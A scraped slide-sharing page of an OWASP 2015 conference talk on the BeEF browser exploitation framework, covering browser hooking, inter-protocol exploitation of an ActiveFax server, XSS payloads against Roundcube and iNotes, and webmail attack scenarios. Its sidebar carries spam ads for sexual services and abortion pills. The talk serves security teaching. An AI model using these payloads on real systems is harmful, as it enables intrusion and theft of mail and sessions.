Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesWindows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
 

Similar to Owasp AppSecEU 2015 - BeEF Session

If You Tolerate This, Your Child Processes Will Be Next
If You Tolerate This, Your Child Processes Will Be NextIf You Tolerate This, Your Child Processes Will Be Next
If You Tolerate This, Your Child Processes Will Be NextBart Leppens
 
(phpconftw2012) PHP as a Middleware in Embedded Systems
(phpconftw2012) PHP as a Middleware in Embedded Systems(phpconftw2012) PHP as a Middleware in Embedded Systems
(phpconftw2012) PHP as a Middleware in Embedded Systemssosorry
 
How to build a tool for operating Flink on Kubernetes
How to build a tool for operating Flink on KubernetesHow to build a tool for operating Flink on Kubernetes
How to build a tool for operating Flink on KubernetesAndreaMedeghini
 
Local development environment evolution
Local development environment evolutionLocal development environment evolution
Local development environment evolutionWise Engineering
 
Php Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansPhp Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansBachkoutou Toutou
 
Road to sbt 1.0 paved with server
Road to sbt 1.0 paved with serverRoad to sbt 1.0 paved with server
Road to sbt 1.0 paved with serverEugene Yokota
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microserviceGiulio De Donato
 
Odo improving the developer experience on OpenShift - hack &amp; sangria
Odo improving the developer experience on OpenShift - hack &amp; sangriaOdo improving the developer experience on OpenShift - hack &amp; sangria
Odo improving the developer experience on OpenShift - hack &amp; sangriaJorge Morales
 
JS digest. October 2017
JS digest. October 2017 JS digest. October 2017
JS digest. October 2017 ElifTech
 
Road to sbt 1.0: Paved with server (2015 Amsterdam)
Road to sbt 1.0: Paved with server (2015 Amsterdam)Road to sbt 1.0: Paved with server (2015 Amsterdam)
Road to sbt 1.0: Paved with server (2015 Amsterdam)Eugene Yokota
 
TechWiseTV Workshop: Catalyst Switching Programmability
TechWiseTV Workshop: Catalyst Switching ProgrammabilityTechWiseTV Workshop: Catalyst Switching Programmability
TechWiseTV Workshop: Catalyst Switching ProgrammabilityRobb Boyd
 
Readactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory DisclosureReadactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory Disclosurech0psticks
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
Deep Dive Azure Functions - Global Azure Bootcamp 2019
Deep Dive Azure Functions - Global Azure Bootcamp 2019Deep Dive Azure Functions - Global Azure Bootcamp 2019
Deep Dive Azure Functions - Global Azure Bootcamp 2019Andrea Tosato
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)David Jorm
 
Embedded Recipes 2019 - Testing firmware the devops way
Embedded Recipes 2019 - Testing firmware the devops wayEmbedded Recipes 2019 - Testing firmware the devops way
Embedded Recipes 2019 - Testing firmware the devops wayAnne Nicolas
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Asher Martin
 
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...Mark West
 

Similar to Owasp AppSecEU 2015 - BeEF Session (20)

If You Tolerate This, Your Child Processes Will Be Next
If You Tolerate This, Your Child Processes Will Be NextIf You Tolerate This, Your Child Processes Will Be Next
If You Tolerate This, Your Child Processes Will Be Next
 
(phpconftw2012) PHP as a Middleware in Embedded Systems
(phpconftw2012) PHP as a Middleware in Embedded Systems(phpconftw2012) PHP as a Middleware in Embedded Systems
(phpconftw2012) PHP as a Middleware in Embedded Systems
 
How to build a tool for operating Flink on Kubernetes
How to build a tool for operating Flink on KubernetesHow to build a tool for operating Flink on Kubernetes
How to build a tool for operating Flink on Kubernetes
 
Local development environment evolution
Local development environment evolutionLocal development environment evolution
Local development environment evolution
 
Monkey Server
Monkey ServerMonkey Server
Monkey Server
 
Php Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick RethansPhp Inside - confoo 2011 - Derick Rethans
Php Inside - confoo 2011 - Derick Rethans
 
Road to sbt 1.0 paved with server
Road to sbt 1.0 paved with serverRoad to sbt 1.0 paved with server
Road to sbt 1.0 paved with server
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microservice
 
Odo improving the developer experience on OpenShift - hack &amp; sangria
Odo improving the developer experience on OpenShift - hack &amp; sangriaOdo improving the developer experience on OpenShift - hack &amp; sangria
Odo improving the developer experience on OpenShift - hack &amp; sangria
 
JS digest. October 2017
JS digest. October 2017 JS digest. October 2017
JS digest. October 2017
 
Road to sbt 1.0: Paved with server (2015 Amsterdam)
Road to sbt 1.0: Paved with server (2015 Amsterdam)Road to sbt 1.0: Paved with server (2015 Amsterdam)
Road to sbt 1.0: Paved with server (2015 Amsterdam)
 
TechWiseTV Workshop: Catalyst Switching Programmability
TechWiseTV Workshop: Catalyst Switching ProgrammabilityTechWiseTV Workshop: Catalyst Switching Programmability
TechWiseTV Workshop: Catalyst Switching Programmability
 
Readactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory DisclosureReadactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory Disclosure
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
Deep Dive Azure Functions - Global Azure Bootcamp 2019
Deep Dive Azure Functions - Global Azure Bootcamp 2019Deep Dive Azure Functions - Global Azure Bootcamp 2019
Deep Dive Azure Functions - Global Azure Bootcamp 2019
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)
 
Embedded Recipes 2019 - Testing firmware the devops way
Embedded Recipes 2019 - Testing firmware the devops wayEmbedded Recipes 2019 - Testing firmware the devops way
Embedded Recipes 2019 - Testing firmware the devops way
 
ESIGate dev meeting #4 21-11-2013
ESIGate dev meeting #4 21-11-2013ESIGate dev meeting #4 21-11-2013
ESIGate dev meeting #4 21-11-2013
 
Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3Cape Cod Web Technology Meetup - 3
Cape Cod Web Technology Meetup - 3
 
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...
JavaOne 2015 : How I Rediscovered My Coding Mojo by Building an IoT/Robotics ...
 

Recently uploaded

SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 

Recently uploaded (20)

CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 

Owasp AppSecEU 2015 - BeEF Session

  • 2. whoami Bart Leppens ● BeEF developer (since may 2012) ● Ported BeEF Bind shellcode to Linux ● Smashing the stack for FUN @bmantra In
  • 3. Disclaimer ● The views and opinions expressed here are my own and do not necessarily represent those of my employer ● My employer has absolutely nothing to do with anything related to BeEF ● I’m not speaking in the representation of my company
  • 4. What the talk? ● BeEF: Browser Exploitation Framework ○ architecture ○ modules ○ extensions ● … live demos and videos
  • 5. BeEF: Browser Exploitation Framework ● Professional security tool ● Focus on client side attack vectors ● Real attack scenarios ● v1.0 by Wade Alcorn http://beefproject.comhttps://github.com/beefproject/beef
  • 6. BeEF: Live CD ● https://github. com/beefproject/beef/wiki/BeEF- Live-CD ● Ubuntu 12.04 LTS ● Ruby 1.9.3p194 ● Metasploit and sqlmap
  • 8. BeEF: Hook a Browser Inject the javascript hook to the DOM ● Cross-site Scripting ● MiTM ● Controlling DNS ● Social Engineering ● … be creative ;)
  • 9. BeEF: Polling ● Once the browser is hooked, the browser will ‘poll’ BeEF for new JavaScript payloads to execute ● When a payload is found, the browser will execute it
  • 10. BeEF: A Whole Lot Of Modules ● Many different purposes ○ Information gathering ○ Social Engineering ○ Network Discovery ○ ... ● Easy to extend with your own modules ● Complex scenarios with RestFul API http://beefproject.comhttps://github.com/beefproject/beef
  • 11. BeEF: Module overview Each module contains 3 primary files: ● config.yaml => Configuration file ● module.rb => Ruby Module Code ● command.js =>JavaScript payload http://beefproject.comhttps://github.com/beefproject/beef
  • 12. BeEF: config.yaml Provides basic information ● name of author ● category ● working browsers ● determines if module is enabled http://beefproject.comhttps://github.com/beefproject/beef
  • 13. BeEF: module.rb Defines configurable options (self.options) Defines return result actions (post.execute) http://beefproject.comhttps://github.com/beefproject/beef
  • 14. BeEF: command.js JavaScript payload template ● Supports eRuby variable substitution <%= @var %> ● Access to the JavaScript BeEF object beef.net.forge_request
  • 15. BeEF: Sesame Magic Browser “Internal server vulnerabilities are sitting there bored and lonely” - Michele Orru` // ”ActiveFax, you look very bored” - Bart Leppens
  • 17. BeEF: Skype iOS URI Scheme
  • 19. BeEF: GlassFish XSRF ● REST CSRF in GlassFish 3.1.1 (build 12) ● Bug FOUND by Roberto Suggi Liverani ● According to ORACLE the 3th most critical bug ever in SUN products ● Demo (fingerprint + exploit)
  • 20. BeEF: CookieJar overflow ● JavaScript cannot modify HTTPOnly-cookies ● John Wilander overflowed the CookieJar ● Recreate those cookies ● Demo
  • 21. BeEF: Autorun ● launch modules automatically on new hooked browsers ● edit config.yaml set autorun: true in each module ● limitation => used with default parameters
  • 22. BeEF: RESTful API Scripting BeEF through HTTP/JSON requests ● token parameter must be always added to requests ● GET or POST ● Automate advanced attacks automatically
  • 23. BeEF: RESTful API Authentication ● Post credentials to /api/admin/login ● return authentication token ● e.g. curl -H "Content-Type: application/json" -X POST -d '{"username":"beef", "password":"beef"}' http://127.0.0.1:3000/api/admin/login
  • 24. BeEF: RESTful API Hooked Browsers ● GET to /api/hooks ● return online/offline hooked browsers ● e.g. curl http://127.0.0.1: 3000/api/hooks?token=[token]
  • 25. BeEF: RESTful API Browser Details ● GET to /api/hooks/:session ● Information on the hooked browser ● e.g. curl http://127.0.0.1: 3000/api/hooks/[session]?token=[token]
  • 26. BeEF: RESTful API List Command Modules ● GET to /api/modules ● e.g. curl http://127.0.0.1: 3000/api/modules?token=[token]
  • 27. BeEF: RESTful API Informations on a specific module ● GET to /api/modules/:module_id ● e.g. curl http://127.0.0.1: 3000/api/modules/[module_id]?token= [token]
  • 28. BeEF: RESTful API Launch a command on a specific browser ● POST to /api/modules/:session/:module_id ● e.g. curl -H "Content-Type: application/json; charset=UTF-8" -d '{"question":"wtf?"}' -X POST http://127. 0.0.1:3000/api/modules/[session]/ [module]?token=[token]
  • 29. BeEF: RESTful API Return information about the command module previously executed ● GET to /api/modules/:session/:mod_id/: cmd_id ● e.g. curl http://127.0.0.1: 3000/api/modules/[session]/[module_id]/ [cmd_id]?token=[token]
  • 30. BeEF: RESTful API A whole lot more: ● control BeEF DNS rules ● Access Logs ● ... Refer to the BeEF Wiki: https://github. com/beefproject/beef/wiki/BeEF-RESTful-API
  • 31. BeEF: Console Console is a BeEF extension ● metasploit-like console ● should be enabled in the main config. yaml ● control hooked browsers
  • 32. BeEF: Metasploit integration Console is a BeEF extension ● should be enabled in the main config. yaml ● should be configured in extentions/metasploit/ ● msfrpcd can be launched automatically from within BeEF :-)
  • 33. IPC: Inter-Protocol Communication ● Initial research by Wade Alcorn in 2006/2007 ● “Tolerant” protocol implementation that does not drop the client connection after N errors ● A properly encoded POST request can be send to the target: ○ HTTP Headers are parsed as BAD COMMANDS ○ HTTP request body is parsed as VALID COMMANDS (or as SHELLCODE)
  • 34. IPC: Limitations ● Some ports are banned by the Browser (e.g. 21,25,110,..) ● Content-Type: text/plain or multipart/form- data ● Doesn’t work well with binary protocols => often not that tolerant
  • 35. IPC: ActiveFax Server ● Extended research done in 2013 by Michele Orru` & myself ● Widely used Fax solution ● Manual suggest port 3000 for RAW socket ● Protocol is very tolerant ● Commands are formatted as: @Fxxx data@
  • 36. IPC: ActiveFax Server (example message) Sender...................... Bart Leppens, +1 11 112233-25 Recipient 1............... OWASP Belgium, Fax: 016 123456 Subject..................... IPC is cool Priority...................... Very High @F101 Bart Leppens@@F110 +1 11 112233-25@ @F201 OWASP Belgium@@F211 016 123456@ @F307 IPC is cool@ @F301 1@
  • 37. IPC: ActiveFax Server (XHR) var xhr = new XMLHttpRequest(); var uri = "http://x.x.x.x:3000/"; xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); var post_body = "@F101 Bart Leppens@@F110 +1 11 112233- 25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@"; xhr.send(post_body);
  • 38. IPC: ActiveFax Server (XHR) POST / HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:24.0) Gecko/20100101 Firefox/24.0 .. Content-Type: text/plain; charset=UTF-8 Cache-Control: no-cache @F101 Bart Leppens@@F110 +1 11 112233-25@@F201 OWASP Belgium@@F211 016 123456@@F307 IPC is cool@@F301 1@
  • 40. IPC: ActiveFax Server (Time-out) The ActiveFax RAW socket takes 60 seconds to time-out. We can fix that! 2 seconds is more then enough to send a FAX over a LAN network: xhr = new XMLHttpRequest(); .. xhr.send(post_body); setTimeout(function(){xhr.abort()}, 2000);
  • 41. IPC: ActiveFax Server (Faster Demo)
  • 42. BeEF: NAT Pinning ● Samy Kamkar in 2010 ● Trick user to visit page ● Access port on internal network (via IPC) ● Connection Tracking must be enabled ● not only routers, IPTables with connection tracking works as well
  • 44. IPE: Inter-Protocol Exploitation ● Research by Wade Alcorn (extension of IPC) ● Extended research in 2012 by Michele Orru` ○ QualCOMM WorldMail IMAP 3.0 ● More research in 2013 by Michele & myself ○ ActiveFax Server
  • 45. IPE: Inter-Protocol Exploitation ● Need to send binary data ○ sendAsBinary (FF, Chrome) ● Same restrictions: tolerance, blocked ports ● More restrictions: header space, bad chars
  • 46. IPE: ActiveFax 5.01 RAW Server Exploit ● bug found by Craig Freyman ● @F506 crashes after 1024 bytes ● Many bad characters: ○ 0x00 -> 0x19 ○ 0x40 (@) ● PoC modified to use IPE
  • 47. IPE: ActiveFax (Metasploit Reverse shell)
  • 49. BeEF Bind Shellcode ● Shellcode written by Ty Miller (Win32) ● Allows communication from the browser to a shell ○ Commands are proxied back and forth through the browser to cmd.exe ○ Stage is delivered through the browser as well
  • 50. BeEF Bind Shellcode: The Stager ● Stager listens on a specified port for HTTP requests ● Ignores HTTP headers and looks for the egg “cmd=” which marks the start of our 2nd stage (or any stage you like) ● Allocate executable memory + copy ● Jump into the stage shellcode
  • 51. BeEF Bind Shellcode: The Stage ● Stage listens on a specified port for HTTP requests as well ● Ignores HTTP headers and looks for “cmd=” which marks the start of our command ● Requests are proxied back and forth from the browser to a “cmd.exe” childprocess ● Access-Control-Allow-Origin: *
  • 52. BeEF Bind Shellcode: ● Ported to Linux x86 and Linux x64 ○ stager and stage ● Can also be used compiled with RCE vulns ● Metasploit modules are available for easily encoding and removal of bad characters
  • 53. IPE: ActiveFax (BeEF Bind + BeEF)
  • 55. Exploiting Webmail with XSS Cross-site Scripting ● most common vulnerability ● impact = underestimated ● mail = interesting target for attacker
  • 56. CVE-2011-2937 Round-cube reflected Cross-site Scripting vulnerability ● found by Abyszko ● before 0.5.4 http://server/roundcube/?_mbox=<script> alert(document.cookie)</script> CVE score for this bug is 4.3 out of 10.
  • 57. CVE-2014-0913 Lotus iNotes stored Cross-site Scripting vulnerability ● IBM iNotes and Domino 8.5.3 FP6 before IF2 and 9.0.1 before FP1 ● Inject arbitrary web script or HTML via an e- mail message CVE score for this bug is 4.3 out of 10.
  • 58. CVE-2014-0913 Lotus iNotes telnet iNotesSMTPserver 25 HELO xss MAIL FROM: attacker@evil.com RCPT TO: poorvictim@good.com DATA MIME-Version: 1.0 FROM: ATTACKER <attacker@evil.com> TO: VICTIM <poorvictim@good.com> Subject: iNotes XSS vulnerable mail Content-Type: text/html <img style="display:none" src="x"/onerror="alert(1)">
  • 59. Universal Cross-site Scripting and webmail ● Control every origin ● Execute arbitrary code ● Control all webmail clients => including Cloud based like gmail, yahoo mail, etc.
  • 60. This is a myth: there ain’t no such thing ● Targeted mailbox attack ○ read mails ○ send mails ● Nesting and replication ○ Mailworm - Nduja by Rosario Valotta in 2007 ■ spreading across multiple webmail services ■ named after spicy italian sausage from Calabria, Italy
  • 61. This is a myth: there ain’t no such thing ● DDoS of server ○ BeEF DOSer-module ○ also internal servers (via victims browser) ● DDoS of mailbox ○ multiple zombies sending mails to victim
  • 62. This is a myth: there ain’t no such thing ● Sending spam ○ by email account of trusted user ● Download infection ○ attachment that seems to be sent from well-know user (=victim) ○ Replace attachment links in existing mails
  • 63. This is a myth: there ain’t no such thing ● Modify existing “notes” ● Social Engineering attacks by mail ● Perform reset of passwords ● names.nsf in iNotes ● ….
  • 64. This is a myth: there ain’t no such thing 4.3/10
  • 65. DEMO
  • 66. Tunneling Proxy Reverse HTTP Proxy ● hooked browser = exit point ● XHR requests or WebSockets ● limited to the hooked domain and security context of the victims browser
  • 67. Tunneling Proxy Attack scenarios ● browsing hooked domain (security context of the victim browser) ● spidering hooked domain ● finding and exploiting SQLi with Burp Pro Scanner and sqlmap ● Video
  • 68. BeEF: Video Videos ● TrixBox exploit ● WebCloner Massmailer ● uiabuse ● Distributed Blind SQLi ● ..
  • 69. For those who can’t get enough ● Browser Hackers Handbook ○ 50% of revenues will be used for the BeEF project (testing infrastructure, etc..)
  • 70. Thanks to ● OWASP ● The other BeEF guys ;) ● My wife for lending her laptop